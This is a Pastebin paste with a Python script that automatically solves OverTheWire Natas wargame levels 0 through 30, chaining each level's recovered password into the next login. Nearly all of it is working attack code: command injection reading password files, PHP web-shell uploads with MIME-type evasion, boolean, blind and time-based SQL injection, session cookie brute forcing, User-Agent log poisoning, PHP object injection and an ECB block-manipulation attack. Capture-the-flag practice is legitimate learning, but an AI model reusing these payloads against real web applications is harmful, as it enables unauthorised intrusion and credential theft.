API tools faq
paste
Guest User

Untitled

a guest
Jan 3rd, 2018
450
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.63 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python3
  2.  
  3. import requests
  4. import re
  5. import binascii
  6. import base64
  7. from urllib.parse import quote, unquote
  8. from itertools import cycle
  9. import string
  10.  
  11.  
  12. from phpserialize import serialize, phpobject
  13.  
  14.  
  15. CHAR_SET = string.ascii_letters + string.digits
  16. PASSWORD_LENGHT = 32
  17. COOKIE_LENGTH = 641
  18.  
  19. def natas0(url):
  20. """Simply on the homepage"""
  21. return re.findall(r"The password for natas. is (.{32})", requests.get(url).text)[0]
  22.  
  23. def natas1(url):
  24. """Same as natas0"""
  25. return natas0(url)
  26.  
  27. def natas2(url):
  28. """The password is in another file"""
  29. return re.findall(r"natas3:(.{32})", requests.get(f"{url}files/users.txt").text)[0]
  30.  
  31. def natas3(url):
  32. """OBEY_ROBOTS=False (Bad robot)"""
  33. session = requests.Session()
  34. response = session.get(f"{url}robots.txt")
  35. page = re.findall(r"Disallow: (.*)", response.text)[0]
  36. response = session.get(f"{url}{page}users.txt")
  37. return response.text.split(':')[1].rstrip()
  38.  
  39. def natas4(url):
  40. """Set referer field to get the password"""
  41. session = requests.Session()
  42. response = session.get(url, headers={'referer': 'http://natas5.natas.labs.overthewire.org/'})
  43. return re.findall(r"The password for natas. is (.{32})", response.text)[0]
  44.  
  45. def natas5(url):
  46. """Set the required bit to log in"""
  47. session = requests.Session()
  48. response = session.get(url, cookies={'loggedin': '1'})
  49. return re.findall(r"The password for natas. is (.{32})", response.text)[0]
  50.  
  51. def natas6(url):
  52. """Such s3cr3t"""
  53. session = requests.Session()
  54. response = session.get(f"{url}includes/secret.inc")
  55.  
  56. secret = re.findall(r""(.*)"", response.text)[0].rstrip()
  57. payload = {'submit': 'submit', 'secret': secret}
  58. response = session.post(url, data=payload)
  59. return re.findall(r"The password for natas. is (.{32})", response.text)[0]
  60.  
  61. def natas7(url):
  62. """Use directory traversal to find the password file"""
  63. response = requests.get(f"{url}?page=../../../../etc/natas_webpass/natas8")
  64. return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  65.  
  66. def natas8(url):
  67. """Reverse engineer encryption technique to get the secret"""
  68. session = requests.Session()
  69. response = session.get(f"{url}index-source.html")
  70.  
  71. secret = re.findall(""(.{32})"", response.text)[1]
  72. decoded_secret = base64.decodestring(binascii.unhexlify(bytes(secret, 'ascii'))[::-1])
  73. payload = {'submit': 'submit', 'secret': decoded_secret}
  74. response = session.post(url, data=payload)
  75. return re.findall(r"The password for natas. is (.{32})", response.text)[0]
  76.  
  77. def natas9(url):
  78. """Always sanatize your input!"""
  79. needle = quote("; cat /etc/natas_webpass/natas10 #")
  80. response = requests.get(f'{url}?needle={needle}&submit=Search')
  81. return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  82.  
  83. def natas10(url):
  84. """More badly sanatized input"""
  85. needle = quote(".* /etc/natas_webpass/natas11 #")
  86. response = requests.get(f'{url}?needle={needle}&submit=Search')
  87. return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  88.  
  89. def natas11(url):
  90. """Fun with breaking xor, to set the cookie"""
  91. # With thnx to @Peilonrayz
  92. def xor_repeat(value, repeater):
  93. return bytes(v ^ r for v, r in zip(value, cycle(repeater)))
  94.  
  95. def decode_base64(data):
  96. return base64.decodestring(data + b'=' * (-len(data) % 4))
  97.  
  98. def _repeated_substring(text):
  99. for i in range(len(text)):
  100. for j in range(i+1, len(text)):
  101. yield text[i:j]
  102.  
  103. def repeated_substring(text):
  104. return max(_repeated_substring(text), key=lambda t: (len(t), text.count(t)))
  105.  
  106. break_json = b'{"showpassword":"no","bgcolor":"#ffffff"}'
  107. gen_json = b'{"showpassword":"yes","bgcolor":"#ffffff"}'
  108.  
  109. cookies = requests.get(url).cookies.get_dict()
  110. cookie = decode_base64(bytes(cookies['data'][:-3], 'ascii'))
  111. password = repeated_substring(xor_repeat(cookie, break_json))
  112. new_cookie = base64.encodestring(xor_repeat(gen_json, password)).rstrip().decode('ascii')
  113.  
  114. session = requests.Session()
  115. response = session.get(url, cookies={'data': new_cookie})
  116. return re.findall(r"The password for natas12 is (.{32})", response.text)[0]
  117.  
  118. def natas12(url):
  119. """Malicious file upload"""
  120. php_payload = '<? include("/etc/natas_webpass/natas13"); ?>'
  121. _file = {'uploadedfile': ('shell.php', php_payload)}
  122. payload = {'filename' : 'shell.php'}
  123.  
  124. session = requests.Session()
  125. response = session.post(url, files=_file, data=payload)
  126. upload = re.findall(r"(upload/S{10}.php)", response.text)[0]
  127. response = session.get(f"{url}{upload}")
  128. return response.text.strip()
  129.  
  130. def natas13(url):
  131. """Altering the MIME type to evade, file upload checker"""
  132. _content = b'xFFxD8xFFxE0<? include("/etc/natas_webpass/natas14"); ?>'
  133. _file = {'uploadedfile': ('shell.php', _content)}
  134. payload = {'filename' : 'shell.php'}
  135.  
  136. session = requests.Session()
  137. response = session.post(url, files=_file, data=payload)
  138. upload = re.findall(r"(upload/S{10}.php)", response.text)[0]
  139. response = session.get(f"{url}{upload}")
  140. return response.text.strip()[4:]
  141.  
  142. def natas14(url):
  143. """SQL Injection"""
  144. username = quote('test')
  145. password = quote('lol" OR "1"="1')
  146. response = requests.post(f'{url}?username={username}&password={password}')
  147. return re.findall(r"The password for natas15 is (.{32})", response.text)[0]
  148.  
  149. def natas15(url):
  150. """Bruteforce SQL Injection to get the password"""
  151. password = ''
  152. session = requests.Session()
  153. for _ in range(PASSWORD_LENGHT):
  154. for char in CHAR_SET:
  155. sql = f'{url}?username=natas16" AND password LIKE BINARY "{password}{char}%'
  156. response = session.get(sql)
  157. if 'This user exists.' in response.text:
  158. password += char
  159. break
  160. return password
  161.  
  162. def natas16(url):
  163. """More bruteforcing"""
  164. password = ''
  165. session = requests.Session()
  166. for _ in range(PASSWORD_LENGHT):
  167. for char in CHAR_SET:
  168. cmd = f'{url}?needle=lol$(grep ^{password}{char} /etc/natas_webpass/natas17)'
  169. response = session.get(cmd)
  170. if 'lol' not in response.text:
  171. password += char
  172. break
  173. return password
  174.  
  175. def natas17(url):
  176. """Abusing the timeout, to do SQL Injection"""
  177. password = ''
  178. session = requests.Session()
  179. for _ in range(PASSWORD_LENGHT):
  180. for char in CHAR_SET:
  181. sql = f'{url}?username=natas18" AND IF(password LIKE BINARY "{password}{char}%", sleep(1), NULL) %23'
  182. respsonse = session.get(sql)
  183. # If this one fails, might need to change time data.
  184. # It is dependent on internet connection
  185. if respsonse.elapsed.total_seconds() >= .5:
  186. password += char
  187. break
  188. return password
  189.  
  190. def natas18(url):
  191. """Cookieforcing"""
  192. session = requests.Session()
  193. for i in range(1, COOKIE_LENGTH):
  194. response = session.get(url, cookies={'PHPSESSID': str(i)})
  195. if 'You are an admin.' in response.text:
  196. return re.findall(r'Password: [^<]*', response.text)[0].split(': ')[1]
  197.  
  198. def natas19(url):
  199. """More Cookieforcing"""
  200. session = requests.Session()
  201. for i in range(1, COOKIE_LENGTH):
  202. cookieID = ''.join(hex(ord(c))[2:] for c in f"{i}-admin")
  203. response = session.get(url, cookies={'PHPSESSID': cookieID})
  204. if 'You are an admin' in response.text:
  205. return re.findall(r'Password: [^<]*', response.text)[0].split(': ')[1]
  206.  
  207. def natas20(url):
  208. """Create account with cookie, and get the Session"""
  209. name = quote("adminnadmin 1")
  210. session = requests.Session()
  211. session.post(f"{url}?name={name}", cookies = {'hack': 'hack'})
  212. cookie = session.cookies.get_dict()
  213. response = session.get(f"{url}", cookies=cookie)
  214. return re.findall(r'Password: [^<]*', response.text)[0].split(': ')[1]
  215.  
  216. def natas21(url):
  217. """Shared cookie failure"""
  218. url_exp = url.split('@')[0] + '@natas21-experimenter.natas.labs.overthewire.org/'
  219. session = requests.Session()
  220. cookie = session.get(url).cookies.get_dict()
  221. data = dict(align='lol', fontsize='100%', bgcolor='yellow', submit='Update', admin='1')
  222. session.post(url_exp, data=data, cookies=cookie)
  223. response = session.get(url, cookies=cookie)
  224. return re.findall(r"Password: [^<]*", response.text)[0].split(': ')[1]
  225.  
  226. def natas22(url):
  227. """No redirections, please!"""
  228. response = requests.get(f"{url}?revelio=harrypotter", allow_redirects=False)
  229. return re.findall(r"Password: [^<]*", response.text)[0].split(': ')[1]
  230.  
  231. def natas23(url):
  232. """PHP int call filters int from string"""
  233. response = requests.get(f"{url}?passwd=11iloveyou")
  234. return re.findall(r"Password: [^<]*", response.text)[0].split(': ')[1]
  235.  
  236. def natas24(url):
  237. """PHP array reference"""
  238. response = requests.get(f"{url}?passwd[]=11iloveyou")
  239. return re.findall(r"Password: [^<]*", response.text)[0].split(': ')[1]
  240.  
  241. def natas25(url):
  242. """Badly sanatized directory traversal + logging of the user agent"""
  243. session = requests.Session()
  244. session.headers.update({'User-Agent': '<? readfile("/etc/natas_webpass/natas26") ?>'})
  245. cookie = session.get(url).cookies.get_dict()
  246. payload = f"....//logs/natas25_{cookie['PHPSESSID']}.log"
  247. response = session.get(f"{url}?lang={payload}", cookies=cookie)
  248. return re.findall(r"] (.{32})", response.text)[0]
  249.  
  250. def natas26(url):
  251. """PHP Object injection, see OWASP"""
  252. class Logger():
  253. def __init__(self,initMsg,exitMsg,logFile):
  254. self.initMsg = initMsg
  255. self.exitMsg = exitMsg
  256. self.logFile = logFile
  257.  
  258. def object_hook(obj):
  259. if isinstance(obj, Logger):
  260. return phpobject('Logger', {b'x00Loggerx00initMsg': obj.initMsg, b'x00Loggerx00exitMsg': obj.exitMsg, b'x00Loggerx00logFile': obj.logFile})
  261.  
  262. session = requests.Session()
  263. logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")
  264. new_ser = base64.encodestring(serialize(logger, object_hook=object_hook)).replace(b'n', b'').decode('ascii')
  265. cookie = dict(drawing=new_ser)
  266. session.get(f"{url}", cookies=cookie)
  267. response = session.get(f"{url}img/code.php")
  268. return re.findall(r"(.{32})", response.text)[0]
  269.  
  270. def natas27(url):
  271. """mysql_fetch_assoc vulnerability"""
  272. session = requests.Session()
  273. data = dict(username='natas28' + ' '*60 + 'hackz', password='')
  274. session.post(url, data=data)
  275. data = dict(username='natas28', password='')
  276. response = session.post(url, data=data)
  277. return re.findall(r"[password] => (.{32})", response.text)[0]
  278.  
  279. def natas28(url):
  280. """Padding Oracle Attack"""
  281. session = requests.Session()
  282. cipher_text = lambda url, plain_text:base64.b64decode(unquote(session.post(url, data={"query":plain_text}).url.split("query=")[1]))
  283.  
  284. def _block_size(url):
  285. ciphertext = cipher_text(url, '')
  286. pre_len = len(ciphertext)
  287. idx = 0
  288.  
  289. while pre_len >= len(ciphertext):
  290. plaintext = 'a' * idx
  291. ciphertext = cipher_text(url, plaintext)
  292. idx += 1
  293.  
  294. return len(ciphertext) - pre_len
  295.  
  296. def _prefix_size(url):
  297. block_size = _block_size(url)
  298. plain_text = 'a' * block_size * 3
  299. cypher = cipher_text(url, plain_text)
  300. cipher_a = ""
  301.  
  302. for i in range(0, len(cypher), block_size):
  303. if cypher[i:i+block_size] == cypher[i+block_size: i+block_size*2]:
  304. cipher_a = cypher[i: i+block_size]
  305. break
  306.  
  307. for i in range(block_size):
  308. plain_text = 'a' * (i + block_size)
  309. cypher = cipher_text(url, plain_text)
  310. if cipher_a in cypher:
  311. return block_size, i, cypher.index(cipher_a)
  312.  
  313. block_size, index, cypher_size = _prefix_size(url)
  314. plain_text = 'a'* (block_size // 2)
  315. cypher = cipher_text(url, plain_text)
  316.  
  317. sql = " UNION ALL SELECT concat(username, 0x3A ,password) FROM users #"
  318. pt = 'a' * index + sql + 'b' * (block_size - (len(sql) % block_size))
  319. ct = cipher_text(url, pt)
  320. e_sql = ct[cypher_size:cypher_size-index+len(pt)]
  321. response = session.get(f"{url}search.php/?query=", params={"query": base64.b64encode(cypher[:cypher_size]+e_sql+cypher[cypher_size:])})
  322. return re.findall(r"<li>natas29:(.{32})</li>", response.text)[0]
  323.  
  324. def natas29(url):
  325. """Perl file issues"""
  326. session = requests.Session()
  327. payload = "|cat+%22/etc/nat%22%22as_webpass/nat%22%22as30%22|tr+%27n%27+%27+%27"
  328. response = session.get(f"{url}index.pl?file={payload}")
  329. return re.findall(r"([^><{} =:/"n]{32})", response.text)[1]
  330.  
  331. def natas30(url):
  332. """Perl MySQL quote(param("parameter")) vulnerable to SQL Injection"""
  333. params={"username": "natas31", "password": ["'lol' or 1",4]}
  334. response = requests.post(url, data=params)
  335. return re.findall(r"natas31(.{32})", response.text)[0]
  336.  
  337. def natas31(url):
  338. print("""This is where I stop
  339. Found it is not nice to post solutions online.
  340. All of the above where online in some from""")
  341. pass
  342.  
  343. # Main functions
  344. def next_level(user, password):
  345. return f'http://{user}:{password}@{user}.natas.labs.overthewire.org/'
  346.  
  347. def next_user(user):
  348. old_digit = ''.join(filter(str.isdigit, user))
  349. return user.replace(old_digit, str(int(old_digit)+1))
  350.  
  351. if __name__ == '__main__':
  352. # Starting point
  353. username = 'natas0'
  354. password = 'natas0'
  355.  
  356. # Function dispenser
  357. dispenser = {'natas0.natas.labs.overthewire.org/': natas0,
  358. 'natas1.natas.labs.overthewire.org/': natas1,
  359. 'natas2.natas.labs.overthewire.org/': natas2,
  360. 'natas3.natas.labs.overthewire.org/': natas3,
  361. 'natas4.natas.labs.overthewire.org/': natas4,
  362. 'natas5.natas.labs.overthewire.org/': natas5,
  363. 'natas6.natas.labs.overthewire.org/': natas6,
  364. 'natas7.natas.labs.overthewire.org/': natas7,
  365. 'natas8.natas.labs.overthewire.org/': natas8,
  366. 'natas9.natas.labs.overthewire.org/': natas9,
  367. 'natas10.natas.labs.overthewire.org/': natas10,
  368. 'natas11.natas.labs.overthewire.org/': natas11,
  369. 'natas12.natas.labs.overthewire.org/': natas12,
  370. 'natas13.natas.labs.overthewire.org/': natas13,
  371. 'natas14.natas.labs.overthewire.org/': natas14,
  372. 'natas15.natas.labs.overthewire.org/': natas15,
  373. 'natas16.natas.labs.overthewire.org/': natas16,
  374. 'natas17.natas.labs.overthewire.org/': natas17,
  375. 'natas18.natas.labs.overthewire.org/': natas18,
  376. 'natas19.natas.labs.overthewire.org/': natas19,
  377. 'natas20.natas.labs.overthewire.org/': natas20,
  378. 'natas21.natas.labs.overthewire.org/': natas21,
  379. 'natas22.natas.labs.overthewire.org/': natas22,
  380. 'natas23.natas.labs.overthewire.org/': natas23,
  381. 'natas24.natas.labs.overthewire.org/': natas24,
  382. 'natas25.natas.labs.overthewire.org/': natas25,
  383. 'natas26.natas.labs.overthewire.org/': natas26,
  384. 'natas27.natas.labs.overthewire.org/': natas27,
  385. 'natas28.natas.labs.overthewire.org/': natas28,
  386. 'natas29.natas.labs.overthewire.org/': natas29,
  387. 'natas30.natas.labs.overthewire.org/': natas30,
  388. 'natas31.natas.labs.overthewire.org/': natas31}
  389.  
  390. for _ in range(len(dispenser)):
  391. url = next_level(username, password)
  392. if requests.head(url).status_code == requests.codes.ok:
  393. print(f"[!] Logged into {username}: {url}")
  394. f = dispenser[url.split("@")[1]]
  395. password = f(url)
  396. username = next_user(username)
  397.  
  398. else:
  399. print(f"[!] Failed {username}: {password}")
  400. break
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!